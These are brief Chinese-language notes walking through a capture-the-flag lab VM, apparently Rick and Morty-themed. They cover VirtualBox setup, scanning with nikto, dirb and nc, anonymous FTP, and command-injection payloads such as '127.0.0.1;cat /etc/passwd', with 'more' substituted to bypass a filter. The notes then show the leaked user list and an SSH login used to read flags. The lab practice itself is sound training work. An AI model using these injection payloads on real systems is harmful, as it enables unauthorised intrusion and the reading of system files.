这次虚拟机不能直接用vmbox导入,给的是硬盘文件,要新建虚拟机,然后选择使用现有的硬盘,不需要操作系统,硬盘里包括了,虚拟机选择linux ubuntu版本,只能在vmbox里新建,不能再vmware里新建,我也不知道为什么,试了好几次都不行。
扫描所有端口号
探测所有信息
探测敏感信息
nikto -host http://靶场ip地址:端口(80端口可省略)
dirb http://靶场ip地址:端口
大端口非http服务,可用nc 探测该端口Banner信息
nc ip地址 端口
大端口http服务,可用浏览器浏览界面查看源代码,寻找flag
http://ip:端口
ftp匿名登陆
ftp://ip 匿名登陆ftp服务器根目录,查看敏感文件,一定要查看源代码
robots.txt文件
命令执行时,为了绕过对应限制,可用相似命令来代替限制的shell命令
127.0.0.1;id
127.0.0.1;cat /etc/passwd
cat用more代替
127.0.0.1;more /etc/passwd
RickSanchez:x:1000:1000::/home/RickSanchez:/bin/bash
Morty:x:1001:1001::/home/Morty:/bin/bash
Summer:x:1002:1002::/home/Summer:/bin/bash
ssh -p port 用户名@ip
pwd ls cat more 执行命令查看flag
用more 来代替cat